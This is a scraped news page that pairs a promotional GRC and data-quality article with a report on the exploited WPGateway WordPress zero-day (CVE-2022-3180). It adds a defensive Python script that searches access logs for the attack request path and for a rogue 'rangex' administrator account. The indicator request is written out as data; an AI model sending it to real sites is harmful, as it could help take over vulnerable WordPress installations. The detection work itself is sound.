Moreover, although companies know how costly wrong information is, many are not working on ensuring quality data through the right processes and controls. In fact, Harvard Business Review reported that 47% of newly created data records have at least one critical error.

Why is that?

Because there is a lack of focus on the right processes and systems that need to be in place to ensure quality data.

What do poor processes cause?

  • Human errors
  • Wrong data handling
  • Inaccurate formatting
  • Different sets of data for various departments
  • Unawareness of risks
  • Incorrect data input or extraction

Fortunately, GRC’s primary goal is to develop the right policies and procedures to ensure everyone in the organization appropriately manages the data.

GRC aims to create a data structure based on the proper governance that will dictate how people organize and handle the company’s information. As a result, GRC will empower companies to be able to extract value from their data.

That is not everything.

Governance, Risk, and Compliance allow organizations to understand the risks associated with data handling and guide managers to create and distribute the policies that will support any data-related activity.

The following are some of the ways GRC is used to achieve and maintain high-quality data:

  • Data governance: Data governance is more than setting rules and telling people what to do. Instead, it is a collection of processes, roles, policies, standards, and metrics that will lead to a cultural change to ensure effective management of information throughout the organization.
  • Education: Achieving good data quality is not easy. It requires a deep understanding of data quality principles, processes, and technologies. GRC facilitates the education process by allowing the organization to seamlessly implement, share, and communicate its policies and standards to every department.
  • Everyone is involved: Everyone must understand the organization’s goal for data quality and the different processes and approaches that will be implemented. GRC focuses on cultural change.
  • Be aware of threats: When managing data, each process has risks associated with it. The mission of GRC is for the organization to recognize and deal with potential threats effectively. When companies are aware of risks, they can implement the necessary controls and rules to protect the data.
  • One single source of truth: A single source of truth ensures everyone in the organization makes decisions based on the same consistent and accurate data. GRC can help by defining the governance over data usage and manipulation. Furthermore, GRC makes it easy to communicate policies, see who the policy creator is, and ensure employees are acting according to the standards.

Get a free consultation with StandardFusion to learn more about how GRC and data governance can boost your organization’s value.

Source :
https://thehackernews.com/2022/09/how-grc-protects-value-of-organizations.html

Over 280,000 WordPress Sites Attacked Using WPGateway Plugin Zero-Day Vulnerability

A zero-day flaw in the latest version of a WordPress premium plugin known as WPGateway is being actively exploited in the wild, potentially allowing malicious actors to completely take over affected sites.

Tracked as CVE-2022-3180 (CVSS score: 9.8), the issue is being weaponized to add a malicious administrator user to sites running the WPGateway plugin, WordPress security company Wordfence noted.

“Part of the plugin functionality exposes a vulnerability that allows unauthenticated attackers to insert a malicious administrator,” Wordfence researcher Ram Gall said in an advisory.


WPGateway is billed as a means for site administrators to install, back up, and clone WordPress plugins and themes from a unified dashboard.

The most common indicator that a website running the plugin has been compromised is the presence of an administrator with the username “rangex.”

Additionally, the appearance of requests to “//wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp_new_credentials=1” in the access logs is a sign that the WordPress site has been targeted using the flaw, although it doesn’t necessarily imply a successful breach.

Wordfence said it blocked over 4.6 million attacks attempting to take advantage of the vulnerability against more than 280,000 sites in the past 30 days.

Further details about the vulnerability have been withheld owing to active exploitation and to prevent other actors from taking advantage of the shortcoming. In the absence of a patch, users are recommended to remove the plugin from their WordPress installations until a fix is available.
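The two indicators above (requests to the WPGateway webservice endpoint with wp_new_credentials=1, and an administrator named "rangex") can be turned into a quick triage check over a site's access log and its list of administrator accounts. The script below is an added example written for this page; it is not Wordfence's tooling nor the plugin's own code. The log lines are constructed in the common/combined web server log format using documentation IP addresses, and the helper names and the parser are assumptions.

```python
import re
from urllib.parse import parse_qs

# Indicators as reported on the page (Wordfence advisory for CVE-2022-3180).
INDICATOR_PATH = "/wp-content/plugins/wpgateway/wpgateway-webservice-new.php"
INDICATOR_PARAM = "wp_new_credentials"
INDICATOR_USERNAME = "rangex"

# Minimal parser for the common/combined log format used by Apache and nginx.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (not real traffic). 203.0.113.0/24 and 198.51.100.0/24
# are reserved documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Sep/2022:10:14:02 +0000] "GET //wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp_new_credentials=1 HTTP/1.1" 200 512
198.51.100.23 - - [12/Sep/2022:10:15:11 +0000] "GET /wp-login.php HTTP/1.1" 200 3401
203.0.113.7 - - [12/Sep/2022:10:15:40 +0000] "POST /wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp_new_credentials=1 HTTP/1.1" 200 128
198.51.100.23 - - [12/Sep/2022:10:16:00 +0000] "GET /index.php HTTP/1.1" 200 9001
"""


def parse_log_line(line):
    """Return a dict of fields for a combined-format line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_wpgateway_probe(target):
    """True if the request target matches the reported indicator.

    The target is split by hand rather than with urllib.parse.urlsplit: the
    reported indicator starts with a double slash ("//wp-content/..."), which
    urlsplit would interpret as an authority component and silently drop from
    the path.
    """
    path, _, query = target.partition("?")
    path = re.sub(r"/+", "/", path)          # collapse "//" so both spellings match
    # endswith() so sites installed in a subdirectory (/blog/wp-content/...) are covered.
    if not path.endswith(INDICATOR_PATH):
        return False
    # The page reports wp_new_credentials=1; any value of the parameter on this
    # endpoint is treated as worth reviewing.
    return INDICATOR_PARAM in parse_qs(query, keep_blank_values=True)


def find_probe_requests(log_lines):
    """Return the parsed records of all requests matching the indicator."""
    hits = []
    for line in log_lines:
        rec = parse_log_line(line)
        if rec and is_wpgateway_probe(rec["target"]):
            hits.append(rec)
    return hits


def probe_sources(log_lines):
    """Map source IP -> number of indicator requests, for prioritising review."""
    counts = {}
    for rec in find_probe_requests(log_lines):
        counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return counts


def suspicious_admins(admin_usernames):
    """Return administrator usernames matching the reported indicator (case-insensitive)."""
    return [u for u in admin_usernames if u.lower() == INDICATOR_USERNAME]


if __name__ == "__main__":
    for rec in find_probe_requests(SAMPLE_LOG.splitlines()):
        print(f"{rec['ts']} {rec['ip']} {rec['method']} {rec['target']} -> {rec['status']}")
    print("per-source counts:", probe_sources(SAMPLE_LOG.splitlines()))
    # Constructed administrator list; in practice feed it the output of
    # `wp user list --role=administrator` or a query of wp_users/wp_usermeta.
    print("suspicious admins:", suspicious_admins(["admin", "Rangex", "editor"]))
```

Note the distinction the advisory draws: a hit in the access log shows the site was targeted, while a matching administrator account (or any administrator nobody can account for) is the stronger sign of an actual compromise. Run the log check over the full retention window, since the reported exploitation spans at least the 30 days cited above, and review the admin list after removing the plugin as recommended.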


The development comes days after Wordfence warned of in-the-wild abuse of another zero-day flaw in a WordPress plugin called BackupBuddy.

The disclosure also arrives as Sansec revealed that threat actors broke into the extension license system of FishPig, a vendor of popular Magento-WordPress integrations, to inject malicious code that’s designed to install a remote access trojan called Rekoobe.

Source :
https://thehackernews.com/2022/09/over-280000-wordpress-sites-attacked.html